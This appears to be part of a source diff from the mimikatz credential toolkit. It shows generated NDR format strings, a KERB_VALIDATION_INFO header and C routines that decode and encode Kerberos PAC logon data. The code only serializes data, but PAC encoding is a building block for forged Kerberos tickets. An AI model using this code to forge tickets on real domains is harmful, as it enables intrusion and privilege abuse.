/* 414 */ NdrFcShort( 0x8c ), /* 140 */
/* 416 */ NdrFcShort( 0x8c ), /* 140 */
/* 418 */ 0x12, 0x0, /* FC_UP */
/* 420 */ NdrFcShort( 0xff56 ), /* Offset= -170 (250) */
/* 422 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 424 */ NdrFcShort( 0x94 ), /* 148 */
/* 426 */ NdrFcShort( 0x94 ), /* 148 */
/* 428 */ 0x12, 0x0, /* FC_UP */
/* 430 */ NdrFcShort( 0xff5e ), /* Offset= -162 (268) */
/* 432 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 434 */ NdrFcShort( 0x98 ), /* 152 */
/* 436 */ NdrFcShort( 0x98 ), /* 152 */
/* 438 */ 0x12, 0x0, /* FC_UP */
/* 440 */ NdrFcShort( 0xfe6a ), /* Offset= -406 (34) */
/* 442 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 444 */ NdrFcShort( 0xc8 ), /* 200 */
/* 446 */ NdrFcShort( 0xc8 ), /* 200 */
/* 448 */ 0x12, 0x0, /* FC_UP */
/* 450 */ NdrFcShort( 0xff5c ), /* Offset= -164 (286) */
/* 452 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 454 */ NdrFcShort( 0xcc ), /* 204 */
/* 456 */ NdrFcShort( 0xcc ), /* 204 */
/* 458 */ 0x12, 0x0, /* FC_UP */
/* 460 */ NdrFcShort( 0xfe56 ), /* Offset= -426 (34) */
/* 462 */
0x46, /* FC_NO_REPEAT */
0x5c, /* FC_PAD */
/* 464 */ NdrFcShort( 0xd4 ), /* 212 */
/* 466 */ NdrFcShort( 0xd4 ), /* 212 */
/* 468 */ 0x12, 0x0, /* FC_UP */
/* 470 */ NdrFcShort( 0xff6a ), /* Offset= -150 (320) */
/* 472 */
0x5b, /* FC_END */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 474 */ 0x0, /* 0 */
NdrFcShort( 0xfe91 ), /* Offset= -367 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 478 */ 0x0, /* 0 */
NdrFcShort( 0xfe8d ), /* Offset= -371 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 482 */ 0x0, /* 0 */
NdrFcShort( 0xfe89 ), /* Offset= -375 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 486 */ 0x0, /* 0 */
NdrFcShort( 0xfe85 ), /* Offset= -379 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 490 */ 0x0, /* 0 */
NdrFcShort( 0xfe81 ), /* Offset= -383 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 494 */ 0x0, /* 0 */
NdrFcShort( 0xfe7d ), /* Offset= -387 (108) */
0x6, /* FC_SHORT */
/* 498 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 500 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 502 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 504 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 506 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 508 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 510 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 512 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 514 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 516 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 518 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 520 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 522 */ 0x4c, /* FC_EMBEDDED_COMPLEX */
0x0, /* 0 */
/* 524 */ NdrFcShort( 0xfe3e ), /* Offset= -450 (74) */
/* 526 */ 0x6, /* FC_SHORT */
0x6, /* FC_SHORT */
/* 528 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 530 */ 0x6, /* FC_SHORT */
0x8, /* FC_LONG */
/* 532 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 534 */ 0x0, /* 0 */
NdrFcShort( 0xfe61 ), /* Offset= -415 (120) */
0x8, /* FC_LONG */
/* 538 */ 0x8, /* FC_LONG */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 540 */ 0x0, /* 0 */
NdrFcShort( 0xfe4f ), /* Offset= -433 (108) */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 544 */ 0x0, /* 0 */
NdrFcShort( 0xfe4b ), /* Offset= -437 (108) */
0x8, /* FC_LONG */
/* 548 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 550 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 552 */ 0x8, /* FC_LONG */
0x8, /* FC_LONG */
/* 554 */ 0x5c, /* FC_PAD */
0x5b, /* FC_END */
/* 556 */
0x12, 0x0, /* FC_UP */
/* 558 */ NdrFcShort( 0xff22 ), /* Offset= -222 (336) */
0x0
}
};
#endif
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

View File

@ -0,0 +1,53 @@
#pragma once
#include "kull_m_rpc.h"
#include "../kull_m_samlib.h"
typedef struct _KERB_SID_AND_ATTRIBUTES
{
PISID Sid;
ULONG Attributes;
} KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES;
typedef struct _KERB_VALIDATION_INFO
{
FILETIME LogonTime;
FILETIME LogoffTime;
FILETIME KickOffTime;
FILETIME PasswordLastSet;
FILETIME PasswordCanChange;
FILETIME PasswordMustChange;
RPC_UNICODE_STRING EffectiveName;
RPC_UNICODE_STRING FullName;
RPC_UNICODE_STRING LogonScript;
RPC_UNICODE_STRING ProfilePath;
RPC_UNICODE_STRING HomeDirectory;
RPC_UNICODE_STRING HomeDirectoryDrive;
USHORT LogonCount;
USHORT BadPasswordCount;
ULONG UserId;
ULONG PrimaryGroupId;
ULONG GroupCount;
/* [size_is] */ PGROUP_MEMBERSHIP GroupIds;
ULONG UserFlags;
USER_SESSION_KEY UserSessionKey;
RPC_UNICODE_STRING LogonServer;
RPC_UNICODE_STRING LogonDomainName;
PISID LogonDomainId;
ULONG Reserved1[ 2 ];
ULONG UserAccountControl;
ULONG SubAuthStatus;
FILETIME LastSuccessfulILogon;
FILETIME LastFailedILogon;
ULONG FailedILogonCount;
ULONG Reserved3;
ULONG SidCount;
/* [size_is] */ PKERB_SID_AND_ATTRIBUTES ExtraSids;
PISID ResourceGroupDomainSid;
ULONG ResourceGroupCount;
/* [size_is] */ PGROUP_MEMBERSHIP ResourceGroupIds;
} KERB_VALIDATION_INFO, *PKERB_VALIDATION_INFO;
size_t PKERB_VALIDATION_INFO_AlignSize(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
void PKERB_VALIDATION_INFO_Encode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
void PKERB_VALIDATION_INFO_Decode(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);
void PKERB_VALIDATION_INFO_Free(handle_t _MidlEsHandle, PKERB_VALIDATION_INFO * _pType);

View File

@ -0,0 +1,84 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_pac.h"
BOOL kuhl_m_pac_DecodeValidationInformation(PVOID data, DWORD size, PKERB_VALIDATION_INFO *pObject)
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
KULL_M_RPC_FCNSTRUCT UserState = {data, size};
handle_t pHandle;
*pObject = NULL;
rpcStatus = MesDecodeIncrementalHandleCreate(&UserState, ReadFcn, &pHandle);
if(NT_SUCCESS(rpcStatus))
{
rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_DECODE);
if(NT_SUCCESS(rpcStatus))
{
RpcTryExcept
PKERB_VALIDATION_INFO_Decode(pHandle, pObject);
status = (*pObject != NULL);
RpcExcept(RPC_EXCEPTION)
PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
RpcEndExcept
}
else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
MesHandleFree(pHandle);
}
else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
return status;
}
void kuhl_m_pac_FreeValidationInformation(PKERB_VALIDATION_INFO *pObject)
{
RPC_STATUS rpcStatus;
handle_t pHandle;
rpcStatus = MesDecodeIncrementalHandleCreate(NULL, NULL, &pHandle);
if(NT_SUCCESS(rpcStatus))
{
PKERB_VALIDATION_INFO_Free(pHandle, pObject);
*pObject = NULL;
MesHandleFree(pHandle);
}
else PRINT_ERROR(L"MesDecodeIncrementalHandleCreate: %08x\n", rpcStatus);
}
BOOL kuhl_m_pac_EncodeValidationInformation(PKERB_VALIDATION_INFO pObject, PVOID *data, DWORD *size)
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
KULL_M_RPC_FCNSTRUCT UserState;
handle_t pHandle;
rpcStatus = MesEncodeIncrementalHandleCreate(&UserState, ReadFcn, WriteFcn, &pHandle);
if(NT_SUCCESS(rpcStatus))
{
*size = (DWORD) PKERB_VALIDATION_INFO_AlignSize(pHandle, &pObject);
if(*data = LocalAlloc(LPTR, *size))
{
rpcStatus = MesIncrementalHandleReset(pHandle, NULL, NULL, NULL, NULL, MES_ENCODE);
if(NT_SUCCESS(rpcStatus))
{
UserState.addr = *data;
UserState.size = *size;
PKERB_VALIDATION_INFO_Encode(pHandle, &pObject);
status = TRUE;
}
else PRINT_ERROR(L"MesIncrementalHandleReset: %08x\n", rpcStatus);
if(!status)
{
*data = LocalFree(*data);
*size = 0;
}
}
MesHandleFree(pHandle);
}
else PRINT_ERROR(L"MesEncodeIncrementalHandleCreate: %08x\n", rpcStatus);
return status;
}

View File

@ -0,0 +1,12 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#include "kull_m_rpc_ms-pac.h"
BOOL kuhl_m_pac_DecodeValidationInformation(PVOID data, DWORD size, PKERB_VALIDATION_INFO *pObject);
void kuhl_m_pac_FreeValidationInformation(PKERB_VALIDATION_INFO *pObject);
BOOL kuhl_m_pac_EncodeValidationInformation(PKERB_VALIDATION_INFO pObject, PVOID *data, DWORD *size);